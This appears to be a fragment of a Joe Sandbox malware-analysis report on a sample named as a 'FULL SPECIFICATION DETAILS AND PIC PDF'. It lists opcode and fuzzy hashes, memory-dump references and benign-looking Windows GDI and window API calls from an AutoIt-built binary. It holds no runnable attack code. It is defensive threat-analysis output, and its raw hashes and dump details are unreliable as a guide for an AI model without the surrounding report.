                                      • API String ID:
                                      • Opcode ID: c3fabd00a3ef493a2bfa36f3f95790ae5c2f9a34efa10ea84ad151e813386841
                                      • Instruction ID: fe292e836f6711cf2f242e3c8754d3de476b6aa56e9db570abfbdf7f034a506b
                                      • Opcode Fuzzy Hash: c3fabd00a3ef493a2bfa36f3f95790ae5c2f9a34efa10ea84ad151e813386841
                                      • Instruction Fuzzy Hash: B9329E75E082498FDB36CFA8C4857ECBBB6BF09310F65852AD859EB291D3399C45CB40
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 17238fdfae74eda5e377931ce01843d7014da8985009bb3bba4c71b9e395c76f
                                      • Instruction ID: 7d2041339b6130ab46d2423a81a97b2798cc00367e6a4459970336bc890d7014
                                      • Opcode Fuzzy Hash: 17238fdfae74eda5e377931ce01843d7014da8985009bb3bba4c71b9e395c76f
                                      • Instruction Fuzzy Hash: B4321422E29F414DD7239635D822336A39DAFB73D4F15D737E819B5DAAEB28C4835100
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 540e05c9d39d57381d420a26876b3417d0b036a5e77a6e2ecbe4c0b08b03caef
                                      • Instruction ID: bb636cf8f8b344cc7ec53c03fe010a45280503ee05f977fad47a70eaf7e128e2
                                      • Opcode Fuzzy Hash: 540e05c9d39d57381d420a26876b3417d0b036a5e77a6e2ecbe4c0b08b03caef
                                      • Instruction Fuzzy Hash: 2A2298716183009FD726DF14C891BAFB7E8AF84314F11491EF99A9F2A1DB71E944CB82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 22b80eeed607bc25720e2431976139bc70f79f6491af109f4a3b83ef9bc813c5
                                      • Instruction ID: ff491b91436b1fe26da233be76e67c5386c855613669dd96ab73fc40ccbfb8ea
                                      • Opcode Fuzzy Hash: 22b80eeed607bc25720e2431976139bc70f79f6491af109f4a3b83ef9bc813c5
                                      • Instruction Fuzzy Hash: AA129071E006199FDF15CFA8E8905ECB7B2FB8C320F65862DE426EB694D774A911CB40
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7b4bbca89500df55cfad13d31e99f660e36799e05b27f1ad51d825235cdc89ae
                                      • Instruction ID: e86310e91c43f17b23d6899823f32f8c844c440384f93f4933a8aeb0f10210ed
                                      • Opcode Fuzzy Hash: 7b4bbca89500df55cfad13d31e99f660e36799e05b27f1ad51d825235cdc89ae
                                      • Instruction Fuzzy Hash: 8312AF71E106199FDF19CFA8D8905EDB7B2FBC8310F24862EE526EB294D774A901CB40
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 325d330d34db0fdddf54b1f9ef78bd56c84181efddde23b5ca5f0ce967295018
                                      • Instruction ID: 7edddc4e0f36288a68b9c86e4c87df65d5f0dd2b01b578b755899ec6a010cbec
                                      • Opcode Fuzzy Hash: 325d330d34db0fdddf54b1f9ef78bd56c84181efddde23b5ca5f0ce967295018
                                      • Instruction Fuzzy Hash: 5012AF70A00609DFDF06DFA5D982AEEB7F9FF48300F104669E806EB655EB35A914CB50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4621b4390cd5b468ff12d18b651731c33bb0be96cfa0d1178663c60751cb2bf6
                                      • Instruction ID: 48593709e9577025b9d62eea83fb14d3c8e1b6b014ab300aca58f044904e782b
                                      • Opcode Fuzzy Hash: 4621b4390cd5b468ff12d18b651731c33bb0be96cfa0d1178663c60751cb2bf6
                                      • Instruction Fuzzy Hash: 5312BD70904206CFDB26DF58C480AAAB7F0FF58314F168069E98AAF751E735BD85CB91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 04d0ac1fcc08aad1d22c7b0f03909a9a1b4ec2bf66c8097fef2fc6138227a730
                                      • Instruction ID: cc8d9543e8260733927136c815604cc07c3548d90be1219da42269c445330ec5
                                      • Opcode Fuzzy Hash: 04d0ac1fcc08aad1d22c7b0f03909a9a1b4ec2bf66c8097fef2fc6138227a730
                                      • Instruction Fuzzy Hash: 700290B0A00105DBCF16DF64D981AAFBBF9EF44300F118469E906DF265EB31EA15CB91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: daa0bbb24984a8a543e250f46780a04699704cd7b513c438dcd45243517a8a81
                                      • Instruction ID: 525d67d32432846d23c6202ca46ca148019a0baa49555c28b5e24edfb8d6c698
                                      • Opcode Fuzzy Hash: daa0bbb24984a8a543e250f46780a04699704cd7b513c438dcd45243517a8a81
                                      • Instruction Fuzzy Hash: EF02C6322051930ECF1E4A39847193B7BA16A527B631B477DDCB6CF4E6EF20D528D650
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                      • Instruction ID: d6eb7c5c7d737e47d6f8e9286e90ac72b5232ca2958a4fcef1f62ea417529371
                                      • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                      • Instruction Fuzzy Hash: 0AC186362051930EDF2F463AD47643FBAA15A927B231B476DD8B3CB5E9EF10C528D620
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                      • Instruction ID: 3e2567311adf72461193e9270d7becd74cdb4062f4428ac1e398cd964e845d6f
                                      • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                      • Instruction Fuzzy Hash: CAC1933220519309DF6E4639C47643FBAA15EA27B231B476DD8B2CB5E9EF20D528D620
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction ID: 444172c533d47946d9c84d1d1e91971991adb3d61e511cf476c24dd5f57d3d45
                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction Fuzzy Hash: 65C170322050930DDF2E4639D47583EBAA15AA2BB631B077DDCB2CB5F5EF20C568D620
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 766f83fbc61e1e641ac8a7d15449ea379c4f4bcfa2ff3e4fdc5b41657403f5e0
                                      • Instruction ID: 99396e674043f32e5a52ed04dfa88bcd8956d7f5e39e697d5ca90434039069c0
                                      • Opcode Fuzzy Hash: 766f83fbc61e1e641ac8a7d15449ea379c4f4bcfa2ff3e4fdc5b41657403f5e0
                                      • Instruction Fuzzy Hash: ECB1CF20D2AF414DD62396399871336B75CAFBB3D6F92D71BFC2A74D62EB2185834180
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cb0e90529256691fe451d747a1bfd7884784a9d5e0aed58ac6818287fd2a7404
                                      • Instruction ID: ac3733dc861c41a6a1d71ddee720e963815d0feab54f979ed4f185c140e73e69
                                      • Opcode Fuzzy Hash: cb0e90529256691fe451d747a1bfd7884784a9d5e0aed58ac6818287fd2a7404
                                      • Instruction Fuzzy Hash: 5A614C71E016269BCF29CF59C490169BBF6FF88300719C1AAD959DF31AE734E941CB90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                      • Instruction ID: 3e8e5e45321f5513ca8efc9e8b3c12a13aa2e2826fce88691029ea1f4f028989
                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                      • Instruction Fuzzy Hash: 4D41A2B1D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Time$FileSystem
                                      • String ID:
                                      • API String ID: 2086374402-0
                                      • Opcode ID: 5672027a0014268e01c5e946c776db46ded3d6f50b1796672cc6ce2aca8e0141
                                      • Instruction ID: d3e5b90961e1901f759e94eff278dbc957959addf64fe2b59bca7eb20307f237
                                      • Opcode Fuzzy Hash: 5672027a0014268e01c5e946c776db46ded3d6f50b1796672cc6ce2aca8e0141
                                      • Instruction Fuzzy Hash: 3121A2726346118BC72ACF28C481A52FBE5EB95311B248E7DE4E5CF2C0CB74B905CB54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                      • Instruction ID: 428d19142a1a62fdd7f46167f23c7c43c5ded89038b702d343119048bdd25a27
                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                      • Instruction Fuzzy Hash: 21018078A01209EFCB45DF98C5909AEFBF5FF88310B2085D9D809A7701E730AE81DB80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                      • Instruction ID: 298d12bfaa15570f71f5a210b41cad9bacdca3d91a5a501096aa6d61b18ecd7a
                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                      • Instruction Fuzzy Hash: FB018079A00209EFCB48DF98C5909AEFBF5FB48310B2085DAD809A7741D730AE81DB80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 0039A2FE
                                      • DeleteObject.GDI32(00000000), ref: 0039A310
                                      • DestroyWindow.USER32 ref: 0039A31E
                                      • GetDesktopWindow.USER32 ref: 0039A338
                                      • GetWindowRect.USER32(00000000), ref: 0039A33F
                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0039A480
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0039A490
                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A4D8
                                      • GetClientRect.USER32(00000000,?), ref: 0039A4E4
                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0039A51E
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A540
                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A553
                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A55E
                                      • GlobalLock.KERNEL32(00000000), ref: 0039A567
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A576
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0039A57F
                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A586
                                      • GlobalFree.KERNEL32(00000000), ref: 0039A591
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A5A3
                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,003CD9BC,00000000), ref: 0039A5B9
                                      • GlobalFree.KERNEL32(00000000), ref: 0039A5C9
                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0039A5EF
                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0039A60E
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A630
                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A81D
                                       Memory Dump Source
                                       • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                      • String ID: $AutoIt v3$DISPLAY$static
                                      • API String ID: 2211948467-2373415609
                                      • Opcode ID: 229cbceb3dac061b3e968da9a0360a35b6f6ad26a38cb7513490040e12e48838
                                      • Instruction ID: f8cfe5cc25906495f709f0d124b1006922e5bafb012733748bc70168c1f46f32
                                      • Opcode Fuzzy Hash: 229cbceb3dac061b3e968da9a0360a35b6f6ad26a38cb7513490040e12e48838
                                      • Instruction Fuzzy Hash: 16025D75900114EFDB16DFA5DD89EAE7BB9EB48310F048668F905EB2A0C770AD41CBA0
                                      APIs
                                      • SetTextColor.GDI32(?,00000000), ref: 003AD2DB
                                      • GetSysColorBrush.USER32(0000000F), ref: 003AD30C
                                      • GetSysColor.USER32(0000000F), ref: 003AD318
                                      • SetBkColor.GDI32(?,000000FF), ref: 003AD332
                                      • SelectObject.GDI32(?,00000000), ref: 003AD341
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 003AD36C
                                      • GetSysColor.USER32(00000010), ref: 003AD374
                                      • CreateSolidBrush.GDI32(00000000), ref: 003AD37B
                                      • FrameRect.USER32(?,?,00000000), ref: 003AD38A
                                      • DeleteObject.GDI32(00000000), ref: 003AD391
                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 003AD3DC
                                      • FillRect.USER32(?,?,00000000), ref: 003AD40E
                                      • GetWindowLongW.USER32(?,000000F0), ref: 003AD439
                                        • Part of subcall function 003AD575: GetSysColor.USER32(00000012), ref: 003AD5AE
                                        • Part of subcall function 003AD575: SetTextColor.GDI32(?,?), ref: 003AD5B2
                                        • Part of subcall function 003AD575: GetSysColorBrush.USER32(0000000F), ref: 003AD5C8
                                        • Part of subcall function 003AD575: GetSysColor.USER32(0000000F), ref: 003AD5D3
                                        • Part of subcall function 003AD575: GetSysColor.USER32(00000011), ref: 003AD5F0
                                        • Part of subcall function 003AD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003AD5FE
                                        • Part of subcall function 003AD575: SelectObject.GDI32(?,00000000), ref: 003AD60F
                                        • Part of subcall function 003AD575: SetBkColor.GDI32(?,00000000), ref: 003AD618
                                        • Part of subcall function 003AD575: SelectObject.GDI32(?,?), ref: 003AD625
                                        • Part of subcall function 003AD575: InflateRect.USER32(?,000000FF,000000FF), ref: 003AD644
                                        • Part of subcall function 003AD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003AD65B
                                        • Part of subcall function 003AD575: GetWindowLongW.USER32(00000000,000000F0), ref: 003AD670
                                        • Part of subcall function 003AD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003AD698
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
